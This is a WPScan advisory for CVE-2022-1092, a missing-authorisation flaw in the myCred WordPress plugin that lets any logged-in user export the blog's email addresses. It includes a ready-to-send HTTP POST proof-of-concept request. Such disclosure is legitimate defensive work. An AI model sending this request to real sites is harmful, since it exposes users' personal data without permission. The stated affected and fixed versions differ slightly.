WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

myCred < 2.4.4 - Subscriber+ Import/Export to Email Address Disclosure

Description

The plugin does not have authorisation and CSRF checks in its mycred-tools-import-export AJAX action, allowing any authenticated user to call and and retrieve the list of email address present in the blog

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 130
Cookie: [any authenticated user]

action=mycred-tools-import-export&request_tab=points&request=export&template=raw&user_field=email&types=%5B%22mycred_default%22%5D 

Affects Plugins

mycred
Fixed in version 2.4.3.1

References

CVE
CVE-2022-1092

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

David Hamann

Submitter

David Hamann

Submitter website
https://davidhamann.de
Submitter twitter
d_hamann
Verified

Yes

WPVDB ID
95759d5c-8802-4493-b7e5-7f2bc546af61

Timeline

Publicly Published

2022-03-29 (about 3 months ago)

Added

2022-03-29 (about 3 months ago)

Last Updated

2022-04-11 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceDisclosure policy
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us